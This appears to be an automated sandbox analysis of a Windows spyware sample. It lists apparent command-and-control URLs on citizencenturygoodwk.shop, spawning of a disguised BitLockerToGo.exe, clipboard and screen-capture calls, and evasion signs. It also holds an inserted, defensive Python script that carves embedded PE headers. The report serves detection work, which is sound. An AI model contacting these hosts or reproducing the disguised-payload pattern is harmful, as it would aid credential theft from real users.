              Source: BitLockerToGo.exe, 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2250362177.0000000002885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/4Y
              Source: BitLockerToGo.exe, 00000003.00000003.2238156888.0000000002885000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002831000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279500194.0000000002896000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/api
              Source: BitLockerToGo.exe, 00000003.00000002.2328165604.000000000288C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/api9(
              Source: BitLockerToGo.exe, 00000003.00000002.2328165604.000000000288C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2300807361.000000000288C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/api=/
              Source: BitLockerToGo.exe, 00000003.00000003.2238156888.0000000002831000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/apiP
              Source: BitLockerToGo.exe, 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2250362177.0000000002885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/apiU6
              Source: BitLockerToGo.exe, 00000003.00000003.2238156888.0000000002871000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2227392089.0000000002871000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/apiX
              Source: BitLockerToGo.exe, 00000003.00000002.2328165604.000000000288C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2300807361.000000000288C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/apie6-
              Source: BitLockerToGo.exe, 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/ez
              Source: BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002884000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000002.2328165604.000000000288C000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2279475230.0000000002886000.00000004.00000020.00020000.00000000.sdmp, BitLockerToGo.exe, 00000003.00000003.2265630337.0000000002885000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop/z
              Source: BitLockerToGo.exe, 00000003.00000003.2279134881.0000000002823000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop:443/api
              Source: BitLockerToGo.exe, 00000003.00000002.2328165604.00000000027E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://citizencenturygoodwk.shop:443/apiK
              Source: BitLockerToGo.exe, 00000003.00000003.2252075967.0000000004A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
              Source: BitLockerToGo.exe, 00000003.00000003.2228157227.0000000004A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
              Source: BitLockerToGo.exe, 00000003.00000003.2228157227.0000000004A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
              Source: BitLockerToGo.exe, 00000003.00000003.2228157227.0000000004A49000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
              Source: BitLockerToGo.exe, 00000003.00000003.2252075967.0000000004A99000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
              Source: 6xmBUtHylU.exeString found in binary or memory: https://login.chinacloudapi.cn/http2:
              Source: 6xmBUtHylU.exeString found in binary or memory: https://login.microsoftonline.com/stream
              Source: 6xmBUtHylU.exeString found in binary or memory: https://management.azure.cominvalid
              Source: 6xmBUtHylU.exeString found in binary or memory: https://management.chinacloudapi.cnCONTINUATION
              Source: 6xmBUtHylU.exeString found in binary or memory: https://management.core.chinacloudapi.cnFrame
              Source: 6xmBUtHylU.exeString found in binary or memory: https://management.core.usgovcloudapi.nethttp2:
              Source: 6xmBUtHylU.exeString found in binary or memory: https://management.usgovcloudapi.nethttps://management.core.windows.net/
              Source: BitLockerToGo.exe, 00000003.00000003.2251568251.0000000004D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br
              Source: BitLockerToGo.exe, 00000003.00000003.2251568251.0000000004D2C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://support.mozilla.org/products/firefoxgro.all
              Source: BitLockerToGo.exe, 00000003.00000003.2251991909.0000000004AA7000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.mozilla.or
              Source: BitLockerToGo.exe, 00000003.00000003.2251991909.0000000004AA7000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
              Source: BitLockerToGo.exe, 00000003.00000003.2251568251.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/about/gro.allizom.www.bwSC1pmG_zle
              Source: BitLockerToGo.exe, 00000003.00000003.2251568251.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/contribute/gro.allizom.www.hjKdHaZH-dbQ
              Source: BitLockerToGo.exe, 00000003.00000003.2251568251.0000000004D2C000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/?utm_medium=firefox-desktop&utm_source=bookmarks-toolbar&utm_campaig
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49711
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49722
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49720
              Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49720 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49722 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49723 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49717
              Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49715
              Source: unknown | Network traffic detected: HTTP traffic on port 49717 -> 443
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49714
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49713
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49712
              Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49723
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49711 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49712 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49713 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49714 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49715 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49717 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49720 version: TLS 1.2
              Source: unknown | HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49722 version: TLS 1.2
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0025E4A0 OpenClipboard,GetWindowLongW,GetClipboardData,GlobalLock,GlobalUnlock,CloseClipboard
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0025E680 GetDC,GetSystemMetrics,KiUserCallbackDispatcher,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject

              System Summary

              Source: 00000000.00000002.2208741125.000000C000374000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Metasploit Payloads - file msf.war - contents Author: Florian Roth
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0024E880
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00251910
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00245C00
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00234C50
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0024662A
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00250FBC
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00231072
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00233850
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00252052
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00238130
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00253142
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_002699C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0026B270
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00234240
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00236A40
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0026FACD
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0023F300
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0024DBEE
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00259BC7
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00255BD0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00236470
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00252C9D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00269CE0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00262CC0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0025AD4D
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0026B5C0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00231E20
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00254E6B
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0024FFB0
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_00265F90
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_002537FE
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: String function: 00239280 appears 122 times
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: String function: 00238B80 appears 43 times
              Source: 6xmBUtHylU.exe | Static PE information: Number of sections : 12 > 10
              Source: 6xmBUtHylU.exe, 00000000.00000003.2193938229.00000245F7550000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 6xmBUtHylU.exe
              Source: 6xmBUtHylU.exe, 00000000.00000003.2195259181.000000C0004DA000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 6xmBUtHylU.exe
              Source: 6xmBUtHylU.exe, 00000000.00000000.2101657583.00007FF67F84F000.00000008.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilenameBlancco File.exeDVarFileInfo$ vs 6xmBUtHylU.exe
              Source: 6xmBUtHylU.exe, 00000000.00000003.2193969767.00000245F7510000.00000004.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameBITLOCKERTOGO.EXEj% vs 6xmBUtHylU.exe
              Source: 6xmBUtHylU.exe | Binary or memory string: OriginalFilenameBlancco File.exeDVarFileInfo$ vs 6xmBUtHylU.exe
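The OriginalFilename strings above show two different version resources: the submitted file calls itself "Blancco File.exe", while heap and stack memory of the same process carries a second image whose OriginalFilename is BITLOCKERTOGO.EXE, the payload that is later written into the spawned BitLockerToGo.exe. The script below is an added example, not part of this report or of any tool it names: it scans a byte buffer for embedded PE headers, validates each candidate (in-range e_lfanew, PE signature, known machine type, sane section count) so a stray "MZ" pair is not reported, and reads the UTF-16 OriginalFilename that follows. The buffer it scans is constructed inline (a wrapper prefix, a decoy "MZ", then a minimal 32-bit header and version string) so it runs offline; on a real case the input would be the sample file or a process memory dump.

```python
"""Carve embedded PE headers and their OriginalFilename out of a byte buffer.

Added example, not code from this report or from any tool it names. The
buffer returned by build_sample() is constructed: a wrapper prefix, a decoy
'MZ' with an out-of-range e_lfanew, and a minimal 32-bit PE header followed
by a VS_VERSIONINFO-style 'OriginalFilename' string.
"""
import struct

MACHINE_NAMES = {0x014C: "i386", 0x8664: "x86-64", 0xAA64: "arm64"}
PREFIX = b'Go build ID: "constructed"\x00' + b"\x00" * 40   # constructed filler


def carve_pe(buf):
    """Return a list of dicts, one per plausible PE header found in buf."""
    found = []
    pos = buf.find(b"MZ")
    while pos != -1:
        hdr = parse_pe_at(buf, pos)
        if hdr is not None:
            found.append(hdr)
        pos = buf.find(b"MZ", pos + 1)
    return found


def parse_pe_at(buf, off):
    """Validate a candidate DOS header at off; None if it is not a real PE."""
    if off + 0x40 > len(buf):
        return None
    e_lfanew = struct.unpack_from("<I", buf, off + 0x3C)[0]
    pe = off + e_lfanew
    # e_lfanew must point past the DOS header, stay small, and stay in-buffer
    if e_lfanew < 0x40 or e_lfanew > 0x400 or pe + 24 > len(buf):
        return None
    if buf[pe:pe + 4] != b"PE\0\0":
        return None
    machine, nsections, timestamp = struct.unpack_from("<HHI", buf, pe + 4)
    if machine not in MACHINE_NAMES or not 1 <= nsections <= 96:
        return None
    return {
        "offset": off,
        "machine": MACHINE_NAMES[machine],
        "sections": nsections,
        "timestamp": timestamp,
        "original_filename": original_filename(buf, off),
    }


def original_filename(buf, start):
    """Read the UTF-16LE value that follows an 'OriginalFilename' key."""
    key = "OriginalFilename".encode("utf-16-le")
    i = buf.find(key, start)
    if i == -1:
        return None
    j = i + len(key) + 2                       # skip the key and its NUL
    while j + 1 < len(buf) and buf[j:j + 2] == b"\0\0":
        j += 2                                 # VS_VERSIONINFO DWORD padding
    chars = []
    while j + 1 < len(buf) and buf[j:j + 2] != b"\0\0":
        chars.append(buf[j:j + 2])
        j += 2
    return b"".join(chars).decode("utf-16-le") or None


def build_sample():
    """Constructed test buffer: prefix, decoy 'MZ', then a real-looking PE."""
    decoy = b"MZ" + b"\x00" * 0x3A + struct.pack("<I", 0xFFFF0000)
    dos = bytearray(0x40)
    dos[:2] = b"MZ"
    struct.pack_into("<I", dos, 0x3C, 0x80)    # e_lfanew -> PE signature
    stub = b"\x00" * (0x80 - 0x40)
    # IMAGE_FILE_HEADER: Machine=i386, 5 sections, timestamp, no symbols,
    # SizeOfOptionalHeader=0xE0, Characteristics=EXECUTABLE_IMAGE|32BIT
    coff = b"PE\0\0" + struct.pack("<HHIIIHH", 0x014C, 5, 0x5F0A1B2C, 0, 0, 0xE0, 0x0102)
    version = ("OriginalFilename".encode("utf-16-le") + b"\0\0" + b"\0\0"
               + "BITLOCKERTOGO.EXE".encode("utf-16-le") + b"\0\0")
    return PREFIX + decoy + bytes(dos) + stub + coff + version


if __name__ == "__main__":
    for hit in carve_pe(build_sample()):
        print(hit)
```

The decoy shows why the e_lfanew and signature checks matter: "MZ" occurs by chance in large binaries, and a carver that trusts the two bytes alone produces noise. On a dump of the parent process the same loop would report the BitLockerToGo.exe image at the offset where the sandbox saw its version string.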
              Source: 00000000.00000002.2208741125.000000C000374000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Msfpayloads_msf_9 date = 2017-02-09, hash1 = e408678042642a5d341e8042f476ee7cef253871ef1c9e289acf0ee9591d1e81, author = Florian Roth, description = Metasploit Payloads - file msf.war - contents, reference = Internal Research
              Source: classification engine | Classification label: mal100.troj.spyw.evad.winEXE@3/0@1/1
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0025E089 CoCreateInstance
              Source: C:\Users\user\Desktop\6xmBUtHylU.exe | File created: C:\Users\Public\Libraries\fbnae.scif
              Source: C:\Users\user\Desktop\6xmBUtHylU.exeFile opened: C:\Windows\system32\60b6415a5f0d74930314eeeb7aec7b0bfe16859cc1a40da63a927021322150daAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAJump to behavior
              Source: 6xmBUtHylU.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
              Source: C:\Users\user\Desktop\6xmBUtHylU.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
              Source: 6xmBUtHylU.exe | ReversingLabs: Detection: 42%
              Source: 6xmBUtHylU.exe | Virustotal: Detection: 30%
              Source: 6xmBUtHylU.exe | String found in binary or memory: etlfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntim
              Source: 6xmBUtHylU.exe | String found in binary or memory: sysAllocconcurrent map read and map writeruntime: failed to decommit pages/cpu/classes/gc/pause:cpu-seconds/cpu/classes/gc/total:cpu-seconds/gc/limiter/last-enabled:gc-cycle/memory/classes/heap/stacks:bytes/memory/classes/heap/unused:bytes/sched/pauses/stoppin
              Source: 6xmBUtHylU.exeString found in binary or memory: failed to construct HKDF label: %sinvalid nested repetition operatorinvalid or unsupported Perl syntaxcrypto/rc4: invalid buffer overlapGODEBUG sys/cpu: can not disable "chacha20: wrong HChaCha20 key sizereflect.MakeSlice of non-slice typecrypto/md5: invalid hash state size2006-01-02T15:04:05.999999999Z07:00SubscribeServiceChangeNotificationsCOFF symbols count is absurdly highnot a PE file, smaller than tiny PE` SizeOfRawData is larger than filenetwork dropped connection on resettransport endpoint is not connected1776356839400250464677810668945312588817841970012523233890533447265625ryuFtoaFixed32 called with prec > 9persistentalloc: align is too large/memory/classes/heap/released:bytesgreyobject: obj not pointer-alignedmismatched begin/end of activeSweepmheap.freeSpanLocked - invalid freeattempt to clear non-empty span setruntime: close polldesc w/o unblockruntime: inconsistent read deadlinefindrunnable: netpoll with spinningpidleput: P has non-empty run queuetraceback did not unwind completelyruntime: createevent failed; errno=file type does not support deadlinex509: malformed extension OID fieldx509: wrong Ed25519 public key sizex509: invalid authority info accesssuperfluous leading zeros in lengthexecutable file not found in %PATH%ber2der: BER tag length is negativehttps://management.chinacloudapi.cnCONTINUATION frame with stream ID 0too many Questions to pack (>65535)transform: short destination buffer'_' must separate successive digitsbigmod: modulus is smaller than natunsupported signature algorithm: %vtls: too many non-advancing recordstls: server selected an invalid PSKmime: bogus characters after %%: %qhpack: invalid Huffman-encoded datadynamic table size update too largeflate: corrupt input before offset P224 point is the point at infinityP256 point is the point at infinityP384 point is the point at infinityP521 point is the point at infinitychacha20: output smaller than 
inputcrypto/cipher: input not full blocksmethod ABI and value ABI don't alignTime.UnmarshalBinary: invalid lengthstrings.Builder.Grow: negative countstrings: Join output length overflowThunk Address Of Data too spread outPower PC with floating point supportaccessing a corrupted shared library444089209850062616169452667236328125ryuFtoaFixed64 called with prec > 180123456789abcdefghijklmnopqrstuvwxyzbytes.Reader.ReadAt: negative offsetlfstack node allocated from the heap) is larger than maximum page size (runtime: invalid typeBitsBulkBarrieruncaching span but s.allocCount == 0/memory/classes/metadata/other:bytes/sched/pauses/stopping/other:secondsuser arena span is on the wrong listruntime: marked free object in span runtime: unblock on closing polldescruntime: inconsistent write deadlineUnable to determine system directoryruntime: VirtualQuery failed; errno=runtime: sudog with non-nil waitlinkruntime: mcall called on m->g0 stackstartm: P required for spinning=true) is not Grunnable or Gscanrunnable
              Source: 6xmBUtHylU.exe | String found in binary or memory: net/addrselect.go
              Source: 6xmBUtHylU.exe | String found in binary or memory: github.com/saferwall/pe@v1.4.8/loadconfig.go
              Source: unknown | Process created: C:\Users\user\Desktop\6xmBUtHylU.exe "C:\Users\user\Desktop\6xmBUtHylU.exe"
              Source: C:\Users\user\Desktop\6xmBUtHylU.exe | Process created: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe
              Source: C:\Users\user\Desktop\6xmBUtHylU.exe | Section loaded: winmm.dll
              Source: C:\Users\user\Desktop\6xmBUtHylU.exe | Section loaded: powrprof.dll
              Source: C:\Users\user\Desktop\6xmBUtHylU.exe | Section loaded: umpdc.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winhttp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: webio.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mswsock.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: iphlpapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: winnsi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: sspicli.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dnsapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: rasadhlp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: fwpuclnt.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: schannel.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: mskeyprotect.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ntasn1.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncrypt.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ncryptsslp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: msasn1.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptsp.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: rsaenh.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: cryptbase.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: gpapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: dpapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: kernel.appcore.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: amsi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: userenv.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: profapi.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: version.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: wbemcomn.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: uxtheme.dll
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Section loaded: ondemandconnroutehelper.dll
              Source: 6xmBUtHylU.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
              Source: 6xmBUtHylU.exe | Static PE information: Image base 0x140000000 > 0x60000000
              Source: 6xmBUtHylU.exe | Static file information: File size 6814720 > 1048576
              Source: 6xmBUtHylU.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x277000
              Source: 6xmBUtHylU.exe | Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x349800
              Source: 6xmBUtHylU.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
              Source: Binary string: BitLockerToGo.pdb source: 6xmBUtHylU.exe, 00000000.00000003.2193938229.00000245F7550000.00000004.00001000.00020000.00000000.sdmp, 6xmBUtHylU.exe, 00000000.00000003.2195259181.000000C0004DA000.00000004.00001000.00020000.00000000.sdmp, 6xmBUtHylU.exe, 00000000.00000003.2193969767.00000245F7510000.00000004.00001000.00020000.00000000.sdmp
              Source: Binary string: BitLockerToGo.pdbGCTL source: 6xmBUtHylU.exe, 00000000.00000003.2193938229.00000245F7550000.00000004.00001000.00020000.00000000.sdmp, 6xmBUtHylU.exe, 00000000.00000003.2195259181.000000C0004DA000.00000004.00001000.00020000.00000000.sdmp, 6xmBUtHylU.exe, 00000000.00000003.2193969767.00000245F7510000.00000004.00001000.00020000.00000000.sdmp
              Source: 6xmBUtHylU.exe | Static PE information: section name: .xdata
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Code function: 3_2_0027016A push edx; ret 3_2_00270171
              Source: C:\Users\user\Desktop\6xmBUtHylU.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOOPENFILEERRORBOX
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe | System information queried: FirmwareTableInformation
              Source: C:\Windows\BitLockerDiscoveryVolumeContents\BitLockerToGo.exe TID: 5820 | Thread sleep time: -180000s >= -30000s
